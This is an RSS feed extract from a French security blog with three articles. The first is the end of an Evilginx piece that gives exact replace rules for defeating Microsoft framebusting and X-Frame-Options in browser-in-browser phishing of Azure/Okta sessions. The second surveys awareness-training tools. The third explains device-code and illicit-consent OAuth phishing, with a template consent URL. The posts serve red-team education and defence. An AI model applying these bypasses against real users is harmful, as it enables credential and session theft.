<p style="text-align: justify;">La technique de <em>framebuster</em> la plus simple consiste à vérifier si la frame actuelle est la frame principale (<em>top frame</em>), ce que Microsoft implémente. Si le formulaire d’authentification détecte qu’il n’est pas affiché dans la frame principale, il refuse de s’afficher.</p>
<p style="text-align: justify;">Avec Evilginx, il est possible de désactiver cette vérification à l’aide d’un simple modèle de correspondance et de remplacement (<em>match &amp; replace</em>) :</p>
<pre style="text-align: justify;">Replace: if(e.self===e.top){<br />By: if(true){window.oldself=e.self;e.self=e.top;</pre>
<p style="text-align: justify;">Cette modification permet de faire passer l’iframe pour la frame principale (<em>top frame</em>), contournant ainsi la protection.</p>
<h4> </h4>
<h4 style="text-align: justify;">Target=”_top”</h4>
<p style="text-align: justify;">La technique suivante consiste à forcer la soumission du formulaire à rediriger la <em>top frame</em>. Ainsi, si le formulaire est soumis dans une iframe, la redirection s’appliquera non seulement à cette iframe, mais à toute la page, ce qui casse l’effet “Browser-in-Browser”.</p>
<p style="text-align: justify;">Cela peut être réalisé en ajoutant l’attribut target= »_top » au formulaire. Il est ensuite possible de désactiver cette protection avec Evilginx :</p>
<pre style="text-align: justify;"><u>Replace:</u> method="post" target="_top"<br /><u>By:</u> method="post"</pre>
<h4> </h4>
<h4 style="text-align: justify;">Framework specific</h4>
<p style="text-align: justify;">Microsoft utilise un framework spécifique pour ses applications. Ce framework n’implémente pas à proprement parler de techniques de <em>framebusting</em>, mais son fonctionnement interne rend son intégration dans une iframe particulièrement complexe.</p>
<p style="text-align: justify;">Une des limitations principales apparaît au moment où le framework tente d’envoyer des données à une URL construite à partir du domaine de la <em>top frame</em>. Ainsi, au lieu d’envoyer les données à login.evilginx.com, elles sont envoyées à my-phishing-app.com, ce qui interrompt complètement le processus d’authentification.</p>
<p style="text-align: justify;">Pour modifier cette adresse, il n’est pas possible de simplement remplacer le domaine par celui du site de phishing comme cela a été fait précédemment. Il est nécessaire de comprendre le fonctionnement du framework afin de modifier manuellement cette valeur au niveau de l’élément racine :</p>
<pre style="text-align: justify;"><u>Replace:</u> autoSubmit: forceSubmit, attr: { action: postUrl }<br /><u>By:</u> autoSubmit: forceSubmit, attr: { action: \\'/common/login\\'}</pre>
<h4> </h4>
<h4 style="text-align: justify;">HTTP header</h4>
<p style="text-align: justify;">La dernière technique de <em>framebusting</em> repose sur l’en-tête HTTP X-Frame-Options: DENY, qui indique au navigateur que l’application ne peut pas être affichée dans une iframe.</p>
<p style="text-align: justify;">Il est possible de supprimer cet en-tête à l’aide d’Evilginx :</p>
<pre style="text-align: justify;"><u>Replace:</u> X-Frame-Options: DENY<br /><u>By:</u> Test: Test</pre>
<h4> </h4>
<h4 style="text-align: justify;">Final phishlet</h4>
<p style="text-align: justify;">The following video shows an example of browser in browser phishing on a company using Okta/Azure. The attacker will be able, in a single phishing to:</p>
<ul style="text-align: justify;">
<li>Retrieve the Azure credentials</li>
<li>Retrieve the Azure cookies</li>
<li>Retrieve the Okta cookies</li>
<li>Retrieve the MFA enrollment QRCode for Okta</li>
</ul>
<p style="text-align: justify;">La vidéo suivante présente un exemple d’attaque par phishing de type “Browser-in-Browser” ciblant une entreprise utilisant Okta et Azure. Lors d’un seul et unique phishing, l’attaquant est capable de :</p>
<ul style="text-align: justify;">
<li>Récupérer les identifiants Azure</li>
<li>Récupérer les cookies de session Azure</li>
<li>Récupérer les cookies Okta</li>
<li>Récupérer le QR Code d’enrôlement MFA pour Okta</li>
</ul>
<p style="text-align: center;"> </p>
<div align="center"><iframe loading="lazy" title="Exemple d'attaque par phishing" src="https://www.youtube.com/embed/FHsZhNEIH64?si=OxsRrtlIpbkvgdJA" width="800" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>
<p style="text-align: center;"><em>Exemple d’attaque par phishing de type “Browser-in-Browser” ciblant une entreprise utilisant Okta et Azure</em></p>
<p> </p>
<p style="text-align: justify;">L’évolution des techniques de phishing, illustrée par des outils tels qu’Evilginx, révèle une transformation significative des menaces informatiques : il ne s’agit plus uniquement d’exfiltrer des identifiants, mais de détourner des sessions authentifiées dans leur intégralité. En adoptant une posture d’« homme du milieu » (<em>Adversary-in-the-Middle</em>, AiTM), Evilginx est en mesure d’intercepter et de manipuler les échanges entre l’utilisateur et les services légitimes, contournant ainsi les mécanismes traditionnels d’authentification multifacteur (MFA).</p>
<p style="text-align: justify;">Cette capacité ne constitue toutefois qu’un aperçu des possibilités offertes par l’outil. Evilginx peut être ajusté pour automatiser des actions critiques telles que l’enregistrement d’un dispositif MFA, contourner des protections comme les <em>framebusters</em> et garantir un accès persistant à la session utilisateur.</p>
<p style="text-align: justify;">La seule mesure réellement efficace pour réduire les attaques par phishing consiste à déployer des mécanismes d’authentification multifacteur résistants au phishing, tels que les clés FIDO, au minimum pour les comptes administrateurs.</p>




<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/07/phishing-evilginx-pousse-a-ses-limites/">Phishing : Evilginx poussé à ses limites</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/07/phishing-evilginx-pousse-a-ses-limites/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Radar des solutions de sensibilisation à la cybersécurité 2025 : comment trouver la solution adaptée à mes besoins ?</title>
		<link>https://www.riskinsight-wavestone.com/2025/02/radar-des-solutions-de-sensibilisation-a-la-cybersecurite-2025-comment-trouver-la-solution-adaptee-a-mes-besoins/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/02/radar-des-solutions-de-sensibilisation-a-la-cybersecurite-2025-comment-trouver-la-solution-adaptee-a-mes-besoins/#respond</comments>
		
		<dc:creator><![CDATA[Laetitia Reverseau]]></dc:creator>
		<pubDate>Wed, 05 Feb 2025 10:12:53 +0000</pubDate>
				<category><![CDATA[Cyberrisk Management & Strategy]]></category>
		<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Cybersécurité]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[radar]]></category>
		<category><![CDATA[sensibilisation]]></category>
		<category><![CDATA[Wavestone]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=25270</guid>

					<description><![CDATA[<p>D&#8217;après le rapport Verizon 2024, le facteur humain est à l&#8217;origine de 68% des compromissions de données. Conscients de cette vulnérabilité, 90% des cyberattaques exploitent l&#8217;erreur humaine, avec le phishing comme vecteur d’attaque majeur. Dans ce contexte, il devient essentiel...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/02/radar-des-solutions-de-sensibilisation-a-la-cybersecurite-2025-comment-trouver-la-solution-adaptee-a-mes-besoins/">Radar des solutions de sensibilisation à la cybersécurité 2025 : comment trouver la solution adaptée à mes besoins ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;">D&rsquo;après le rapport Verizon 2024, le facteur humain est à l&rsquo;origine de <strong>68% des compromissions de données. </strong>Conscients de cette vulnérabilité, <strong>90% des cyberattaques exploitent l&rsquo;erreur humaine</strong>, avec le phishing comme vecteur d’attaque majeur. Dans ce contexte, il devient essentiel de sensibiliser ses équipes à la cybersécurité tout en répondant précisément aux besoins de votre organisation.</p>
<p style="text-align: justify;">Cependant, bien que les <strong>entreprises</strong> <strong>reconnaissent l&rsquo;importance des contenus de sensibilisation, très peu réussissent à déployer efficacement des solutions adaptées à leurs spécificités</strong>. En effet, si la sensibilisation constitue une priorité, choisir l’outil le mieux adapté reste un défi. Les entreprises font face à une offre variée, allant de formations en ligne standardisées à des outils interactifs et personnalisés.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;"><strong>Un radar de +100 solutions de sensibilisation à la cybersécurité</strong></h2>
<p style="text-align: justify;">Dans un environnement où la sensibilisation à la cybersécurité devient une priorité, le <strong>radar des solutions de sensibilisation se révèle être un allié stratégique</strong> pour les entreprises. Cet outil offre une<strong> vision claire et structurée </strong>des solutions disponibles, aidant les organisations à <strong>identifier les solutions les plus adaptées à leurs besoins</strong>.</p>
<p> </p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-28860 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Image-1.png" alt="" width="847" height="571" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Image-1.png 847w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Image-1-283x191.png 283w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Image-1-58x39.png 58w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Image-1-768x518.png 768w" sizes="auto, (max-width: 847px) 100vw, 847px" /></p>
<p> </p>
<h3 style="text-align: justify;"><strong>Un outil d’aide à la décision</strong></h3>
<p>Le radar permet de <strong>prendre du recul sur l’ensemble des options disponibles</strong> et de <strong>mesurer l’ampleur du choix</strong>. Grâce au radar, les entreprises peuvent <strong>repérer rapidement certaines</strong> <strong>solutions performantes et innovantes, </strong>tout en distinguant des<strong> incontournables</strong>. Pour cela, les solutions ont été regroupées en <strong>7 catégories : </strong></p>
<ol>
<li><strong>Evaluation de la maturité</strong> : Solutions proposant un véritable outil d’évaluation de la maturité cybersécurité, des risques humains allant au-delà de rapports ou questionnaires</li>
<li><strong>E-learning :</strong> Solutions offrant des modules d’apprentissage structurés variés</li>
<li><strong>Sensibilisations techniques</strong> : Solutions proposant des contenus spécifiquement conçus pour les populations techniques (équipes cyber, IT, développeurs, etc.)</li>
<li><strong>IA :</strong> Solutions se reposant sur un outil basé sur l’intelligence artificielle</li>
<li><strong>Chatbot :</strong> Solutions intégrant un agent conversationnel interactif</li>
<li><strong>Phishing :</strong> Solutions spécialisées dans la simulation d’attaques de phishing, à distinguer des modules e-learning abordant le sujet</li>
<li><strong>Jeux :</strong> Solutions spécialisées dans la gamification et proposant des activités ludiques de sensibilisation à la cybersécurité</li>
</ol>
<p>Ce radar a pour vocation de proposer une <strong>vision condensée de notre benchmark</strong> et <strong>ne constitue aucunement un classement</strong>. Il s’agit d’une sélection réfléchie, fondée sur plusieurs critères, entre autres :  la taille de l’entreprise, sa présence sur le marché (français principalement), et notre évaluation experte. Nous avons souhaité <strong>limiter le nombre de solutions représentées pour garantir une</strong> <strong>lecture claire et stratégique</strong>.</p>
<p>La <strong>sélection privilégie les solutions françaises</strong>, toujours en cohérence avec notre base client, tout en intégrant <strong>quelques acteurs internationaux pertinents</strong>. Par ailleurs, seules les solutions dont l’activité de conseil ne représente pas le cœur de leur offre ont été retenues, afin de garantir une <strong>approche orientée produit</strong>.</p>
<p> </p>
<h3 style="text-align: justify;"><strong>Un benchmark pour une solution adaptée</strong></h3>
<p style="text-align: justify;"><strong>Ce radar repose sur un benchmark de plus de +100 solutions disponibles sur le marché</strong>. Il offre ainsi <strong>un panorama complet de l’écosystème</strong> des solutions de sensibilisation.</p>
<p style="text-align: justify;">Le benchmark est <strong>conçu pour guider votre choix</strong> <strong>vers la solution la plus adéquate</strong>. Les entreprises peuvent y rentrer leurs critères pour obtenir une liste réduite d’options : <strong>types de contenus </strong>(phishing, mots de passe, ingénierie sociale, etc.),<strong> types de formats </strong>(vidéos, quizz, chatbot, e-learning, etc.),<strong> disponibilité et modularité de la solution</strong>,<strong> publics visés</strong>,<strong> prix</strong>,<strong> langues</strong>, etc. Cela permet d’<strong>éviter un choix arbitraire</strong> et d’opter pour <strong>une solution véritablement alignée avec les enjeux et les objectifs de sensibilisation</strong>.</p>
<p style="text-align: justify;">Ainsi, sans chercher à être exhaustif, le radar propose ainsi un <strong>large éventail d’options</strong> <strong>pour répondre au mieux aux besoins de votre organisation.</strong></p>
<p> </p>
<h3 style="text-align: justify;"><strong>Les critères d’intégration au benchmark</strong></h3>
<p style="text-align: justify;">Le processus d’intégration au benchmark d’une solution a pour volonté d’être simple. Une fois une solution identifiée, celle-ci est <strong>analysée</strong> et <strong>triée selon des critères précis</strong> auxquels s’ajoutent les <strong>retours de nos consultants Wavestone</strong>. En complément de cela, <strong>des rencontres avec les équipes des éditeurs de solution nous permettent d’affiner notre analyse</strong> avec des démonstrations et collecte d’informations complémentaires.</p>
<p style="text-align: justify;">Ainsi, une solution avec une <strong>interface claire et intuitive</strong>, proposant <strong>des transcriptions en plusieurs langues</strong>, couvrant <strong>une large gamme de sujets</strong> (phishing, cloud, chatbot, etc.) de <strong>manière innovante</strong>, sera particulièrement intéressante. Si elle reçoit en plus de cela des retours positifs de nos consultants, elle aura de fortes chances d’être intégrée au radar.</p>
<p style="text-align: justify;">Le benchmark et son radar s’accompagnent également de <strong>fiches détaillées pour certaines solutions</strong>. <strong>Grâce à</strong> <strong>notre </strong><strong>expertise et nos convictions en sensibilisation</strong>, <strong>les solutions</strong><strong> jugées comme plus pertinentes ont des fiches détaillées</strong> qui incluent un aperçu plus précis de l’interface, un avis de nos experts sur la solution, et sont alimentées par des rencontres avec les éditeurs. Ces fiches permettent non seulement de choisir l&rsquo;outil le plus adapté, mais aussi de <strong>découvrir des alternatives souvent plus performantes, bien que moins connues</strong>.</p>
<p> </p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="size-full wp-image-25298 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Process-FR-v2.png" alt="" width="1318" height="358" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Process-FR-v2.png 1318w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Process-FR-v2-437x119.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Process-FR-v2-71x19.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/02/Process-FR-v2-768x209.png 768w" sizes="auto, (max-width: 1318px) 100vw, 1318px" /></p>
<p style="text-align: center;"><em style="font-size: revert; color: initial;">Processus d&rsquo;intégration d’une solution au benchmark et radar</em></p>
<p> </p>
<h4 style="text-align: left;"><strong>Notes</strong></h4>
<p style="text-align: justify;">Veuillez noter que le radar est une vision réduite du benchmark associé. Si vous remarquez qu’un acteur de la sensibilisation cyber que vous connaissez est absent de ce radar, contactez-nous pour que nous puissions l’évaluer et l’ajouter.</p>
<p style="text-align: justify;">Nous remercions Guillaume MASSEBOEUF pour son aide dans la création de ce radar.</p>
<p> </p>
<p> </p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/02/radar-des-solutions-de-sensibilisation-a-la-cybersecurite-2025-comment-trouver-la-solution-adaptee-a-mes-besoins/">Radar des solutions de sensibilisation à la cybersécurité 2025 : comment trouver la solution adaptée à mes besoins ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/02/radar-des-solutions-de-sensibilisation-a-la-cybersecurite-2025-comment-trouver-la-solution-adaptee-a-mes-besoins/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Les attaques par consentement illicite ciblant Azure et Office 365 : une menace toujours d’actualité ?</title>
		<link>https://www.riskinsight-wavestone.com/2023/03/les-attaques-par-consentement-illicite-ciblant-azure-et-office-365-une-menace-toujours-dactualite/</link>
					<comments>https://www.riskinsight-wavestone.com/2023/03/les-attaques-par-consentement-illicite-ciblant-azure-et-office-365-une-menace-toujours-dactualite/#respond</comments>
		
		<dc:creator><![CDATA[Younes Laaboudi]]></dc:creator>
		<pubDate>Thu, 30 Mar 2023 09:00:00 +0000</pubDate>
				<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[O365]]></category>
		<category><![CDATA[phishing]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=20114</guid>

					<description><![CDATA[<p>Un petit tour d’horizon des techniques d’hameçonnage sur Azure et Office 365 Les attaques par hameçonnage (phishing) sont connues de tous. L’objectif de ce type d’attaque est de réaliser des actions depuis le compte d’une victime ou de récupérer des...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2023/03/les-attaques-par-consentement-illicite-ciblant-azure-et-office-365-une-menace-toujours-dactualite/">Les attaques par consentement illicite ciblant Azure et Office 365 : une menace toujours d’actualité ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h1 style="text-align: justify;">Un petit tour d’horizon des techniques d’hameçonnage sur Azure et Office 365</h1>
<p style="text-align: justify;">Les <strong>attaques par hameçonnage</strong> (phishing) sont connues de tous. L’objectif de ce type d’attaque est de <em>réaliser des actions</em> depuis le compte d’une victime ou de <strong>récupérer des informations</strong> sur la personne ou l’entreprise ciblée.</p>
<p style="text-align: justify;">Malgré leur notoriété, elles restent très efficaces pour les attaquants. En effet, parmi les <a href="https://www.wavestone.com/en/insight/cert-w-2022-cybersecurite-trends-analysis/">attaques investiguées par le CERT Wavestone</a>, environ 51% d’entre elles commencent par l’utilisation de comptes valides, ce qui inclut les <strong>attaques par hameçonnage</strong> (phishing).</p>
<p style="text-align: justify;"><strong>Face aux attaques par l’hameçonnage, nous sommes tous vulnérables !</strong> Un attaquant disposant de suffisamment de ressources et d’informations sur sa cible peut générer <em>un piège assez élaboré</em> pour faire baisser la garde du destinataire. De même, les suites de produits Office365 et Azure disposent de fonctionnalités pouvant être exploitées dans le cadre <em>d’attaques moins conventionnelles et dont les impacts peuvent être méconnus des utilisateurs</em>.</p>
<p style="text-align: justify;">La <strong>sensibilisation des employées</strong>, bien que nécessaire pour faire face aux menaces les plus répandues, ne suffit pas face à certains types d’attaques plus ciblées ou moins traditionnelles. Un <strong>durcissement des conditions d’accès</strong> aux ressources hébergées sur le cloud, <strong>une bonne hygiène dans la gestion des droits d’accès</strong> ainsi que la <strong>détection d’accès inhabituels et suspicieux</strong> sont primordiales dans la stratégie de défense des entreprises.</p>
<p style="text-align: justify;">Les attaquants disposent d’une <strong>large gamme d’outils et de possibilités</strong> pour accéder aux <strong>documents stockés sur le SharePoint</strong> d’une entreprise, tenter de <strong>récupérer des emails sensibles</strong> ou récupérer des informations sur les employés. L’attaque par hameçonnage traditionnelle ainsi que par l’authentification « device code » seront brièvement expliquées ci-dessous avant d’examiner plus en détails les attaques par consentement illicite.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">L’attaque de phishing traditionnelle : une menace connue et évitable via l’usage d’authentification multi facteur</h2>
<p style="text-align: justify;">Les attaques de phishing traditionnelles reposent généralement sur l’envoi d’un <strong>lien dirigeant les victimes ciblées vers un site qu’il contrôle</strong>. Grace à une mire d’authentification similaire à celles auxquelles sont habituées les employées de l’entreprise ciblée, l’attaquant <strong>récupère les identifiants et mots de passe des utilisateurs piégés.</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20128 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2.png" alt="" width="3408" height="2216" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2.png 3408w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2-294x191.png 294w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2-60x39.png 60w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2-768x499.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2-1536x999.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image1-2-2048x1332.png 2048w" sizes="auto, (max-width: 3408px) 100vw, 3408px" /></p>
<p style="text-align: center;"><em>L’attaque par hameçonnage traditionnelle est simple à mettre en œuvre en l’absence d’authentification multi-facteur</em></p>
<p style="text-align: justify;">La <strong>simplicité de mise en œuvre à grande échelle</strong> d’une telle attaque en fait un outil de choix pour les attaques non ciblées. Une méthode pour se prémunir contre ce type d’attaque est <strong>d’imposer l’utilisation d’un second facteur d’authentification.</strong></p>
<p style="text-align: justify;">Il est à noter cependant que bien que plus complexe à mettre en œuvre, <strong>l’interception du second facteur d’authentification est techniquement réalisable</strong> et fera l’objet d’un article dédié.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">L’attaque via l’authentification « device code » : une méthode méconnue d’authentification détournée par des attaquants</h2>
<p style="text-align: justify;">Cette attaque <em>repose sur la </em><strong>fonctionnalité d’octroi d’autorisation d’appareil</strong> (device authorization grant)<a href="#_ftn1" name="_ftnref1">[1]</a>. Cette méthode d’authentification permet <strong>d’authentifier un utilisateur sur un appareil ne disposant pas de navigateur web.</strong> Un code s’affichant sur cet appareil doit alors être renseigné sur un ordinateur ou un smartphone via le site de Microsoft dédié. Cet <strong>appareil disposera ensuite d’une partie des droits d’accès aux ressources Office 365 que l’utilisateur ayant renseigné le code</strong>.</p>
<p style="text-align: justify;">Cette <strong>procédure peu connue des utilisateurs</strong>, peut être exploitée par un attaquant à des fins malveillantes :</p>
<ul style="text-align: justify;">
<li>L’attaquant génère tout d’abord un code d’appareil, en utilisant le même processus utilisé par les appareils ne disposant pas de navigateur web.</li>
<li>Ensuite, l’objectif de l’attaquant sera d’amener la victime à renseigner son code d’appareil sur la page <span style="color: #048b9a;">https://microsoft.com/devicelogin</span>. Par exemple, l’attaquant pourrait prétexter que pour accéder à un document sensible, il est nécessaire de se connecter à ce lien en utilisant le code qu’il a généré.</li>
<li><strong>Si la cible accède au lien, renseigne le code et s’authentifie,</strong> cela <strong>permettra à l’attaquant d’usurper l&rsquo;identité </strong>de la victime.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20132 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2.png" alt="" width="3575" height="2521" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2.png 3575w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2-271x191.png 271w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2-55x39.png 55w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2-768x542.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2-1536x1083.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image2-2-2048x1444.png 2048w" sizes="auto, (max-width: 3575px) 100vw, 3575px" /></p>
<p style="text-align: center;"><em>Exemple d’attaque par hameçonnage par device code</em></p>
<p style="text-align: justify;">Cette attaque est <strong>plus difficile à réaliser pour un attaquant</strong> en raison de la <strong>faible durée de vie des « device codes »</strong> : ces derniers sont uniquement valables pendant une <strong>durée de 15min</strong> et doivent donc être générés peu de temps avant que l’utilisateur ne le renseigne. Cette attaque est donc plus facilement réalisable dans le cadre d’<strong>attaques par « phoning » ou de phishing via Teams</strong>. Par exemple, l’attaquant pourrait appeler la victime, prétexter faire partie de l’équipe du support IT de l’entreprise pour demander à l’utilisateur de s’authentifier sur le lien indiqué et de renseigner le code de son choix.</p>
<p style="text-align: justify;">Pour se prémunir contre ce type d’attaque, les <strong>politiques d’accès conditionnel</strong> sur Azure permettent notamment <strong>d’interdire les connexions suspicieuses provenant d’appareil non maitrisés par l’entreprise.</strong></p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">L’attaque par consentement illicite</h2>
<p style="text-align: justify;">En plus de ces deux méthodes, l’attaque par consentement illicite permet aussi à un attaquant de récupérer un accès à un environnement Azure de manière illégitime. Cette dernière était même initialement plus simple à mettre en œuvre pour un attaquant que les attaques via l’authentification « device code ». Face à la recrudescence de cette menace, <strong>des actions ont été menées en 2020 par Microsoft pour limiter les conditions de réalisation de l’attaque.</strong> Si des configurations durcies d’Azure permettent de totalement bloquer cette menace, les configurations implémentées par certaines entreprises les exposent à ce type d’attaque. Quels sont les <strong>prérequis </strong>pour la réalisation d’une telle attaque, quelles sont les <em>c</em><strong>onséquences possibles et comment s’en prémunir </strong>?</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Qu’est-ce qu’une attaque par consentement illicite ?</h1>
<p style="text-align: justify;">Pour <strong>comprendre le principe</strong> de cette attaque, mettons-nous <strong>dans la peau d’un employé</strong> victime d’une telle attaque :</p>
<ul style="text-align: justify;">
<li>La victime reçoit un<strong> mail d’hameçonnage</strong> indiquant une action urgente à réaliser pour maintenir son compte Microsoft activé. Les employés sont sensibilisés à ne pas cliquer sur des liens de phishing et à ne pas entrer leur mot de passe sur des plateformes inconnues. Le <strong>lien </strong>sous le format <span style="color: #048b9a;">https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=&lt;CLIENT_ID&gt;&amp;redirect_uri=&lt;Attacker_controled_URL&gt;&amp;response_type=code&amp;response_mode=query&amp;scope=Mail.ReadWrite%20Files.Read.All%20Mail.Send%20User.Read</span> contient un <strong>domaine associé à Microsoft</strong>, ce qui rassure la victime.</li>
<li>En cliquant sur le lien, la victime doit s’authentifier. Cette authentification est souvent automatique puisqu’elle bénéficie de l’authentification unique (SSO) de Microsoft. La victime reçoit alors <strong>une demande de délégation de permissions:</strong></li>
</ul>
<p> </p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20144 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagebis.png" alt="" width="493" height="696" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagebis.png 493w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagebis-135x191.png 135w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagebis-28x39.png 28w" sizes="auto, (max-width: 493px) 100vw, 493px" /></p>
<p style="text-align: center;"><em>L’application malveillante demande à l’utilisateur de lui déléguer ses permissions</em></p>
<ul style="text-align: justify;">
<li>Si la victime clique sur « Annuler » par prudence, elle est redirigée vers le serveur de l’attaquant avec une URL du type <span style="color: #048b9a;">&lt;Attacker_controled_URL&gt;/?error=consent_required &amp;error_description=AADSTS65004%3a+User+declined+to+consent+to+access+the+app.&amp;error_uri=https%3a%2f%2flogin.microsoftonline.com%2ferror%3fcode%3d65004#</span>. L’attaquant, comprenant que la victime n’a pas accepté la délégation de permissions, peut ensuite <strong>rediriger la victime sur la page de phishing</strong>, lui <strong>donnant l’impression que les permissions demandées doivent être acceptées</strong> pour passer à l’étape suivante.</li>
<li>En raison du nom de domaine légitime et la vue de l’urgence indiquée dans le mail d’hameçonnage, la <strong>victime de l’attaque choisit d’accepter</strong><em>.</em> Elle observe alors un message indiquant que son compte sera bien maintenu activé, comme suggéré dans le mail initial. Elle reprend donc une activité normale.</li>
</ul>
<p style="text-align: justify;">Or, ce consentement permet à l’attaquant de réaliser <em>des actions au nom de la victime</em>, en fonction des permissions accordées. A noter que l’attaque par consentement illicite a de <em>nombreux avantages</em> pour un attaquant, notamment :</p>
<ul style="text-align: justify;">
<li>L’<strong>utilisation d’une URL associée à Microsoft</strong> lors de la demande de consentement, considérée comme de confiance et impliquant donc moins de méfiance de la part des utilisateurs ciblés.</li>
<li>L’obtention d’un <strong>accès persistant</strong> pendant 90 jours, sans connaissance du mot de passe de l’utilisateur ni du second facteur d’authentification, si aucune stratégie d’accès conditionnels n’est implémentée.</li>
<li>La possibilité de <strong>requêter directement les APIs de Microsoft</strong> pour récupérer de manière automatisée les fichiers, emails et autres ressources de l’entreprise accessibles par l’utilisateur piégé.</li>
</ul>
<p style="text-align: justify;"> </p>
<h4 style="text-align: justify;">Aparté technique</h4>
<p style="text-align: justify;">D’un point de vue technique, <strong>l’attaque par consentement illicite repose sur la capacité d’un attaquant à créer une application demandant des délégations de permissions</strong>. La délégation de permission est une fonctionnalité qui est régulièrement utilisée par les utilisateurs sans qu’ils s’en rendent compte, par exemple le client Outlook est autorisé par défaut à récupérer et les notifier de l’arrivée de nouveaux emails.</p>
<p style="text-align: justify;">Voici les étapes clés lors de la réalisation de ce type d’attaque (qui repose sur la cinématique Authorization Code Grant d’OAuth 2.0) :</p>
<ul style="text-align: justify;">
<li>L’attaquant <strong>crée une application d’entreprise sur Azure AD</strong> (<span style="color: #048b9a;">application registration</span>) et <strong>configure les permissions</strong> qu’il souhaite obtenir <strong>de la part des utilisateurs</strong>. Il peut instancier également un « <strong>client_secret</strong>» sur l’application. Certaines contraintes liées à cette application sont détaillées plus bas.</li>
<li>Il met en place un <strong>serveur vers lequel les utilisateurs seront redirigés</strong> suite aux consentements et indique son URL en tant qu’<strong>URL de redirection valide pour l’application</strong>.</li>
<li>À la suite du <strong>consentement d’un utilisateur</strong>, celui-ci sera <strong>redirigé vers le site</strong> malveillant et un <strong>code sera fourni à l’attaquant.</strong> Ce code est la preuve à montrer à Microsoft que l’utilisateur autorise l’application à faire des actions en son nom.</li>
<li>A l’aide de <em>ce code</em> et du « <strong>client_secret </strong>» de l’application, l’attaquant pourra <strong>récupérer un jeton OAuth</strong>. Ce jeton est un <em>r</em><strong>écépissé signé par Microsoft</strong> qui précise les <strong>actions que la victime autorise à faire en son nom</strong>. L’attaquant peut également récupérer un « refresh_token » permettant de <strong>renouveler la validité du jeton OAuth</strong>.</li>
<li>Ce jeton OAuth est alors utilisable pour envoyer des <strong>requêtes à la Graph API</strong> au nom de la victime et par conséquent permet d’<strong>usurper son identité</strong>.</li>
</ul>
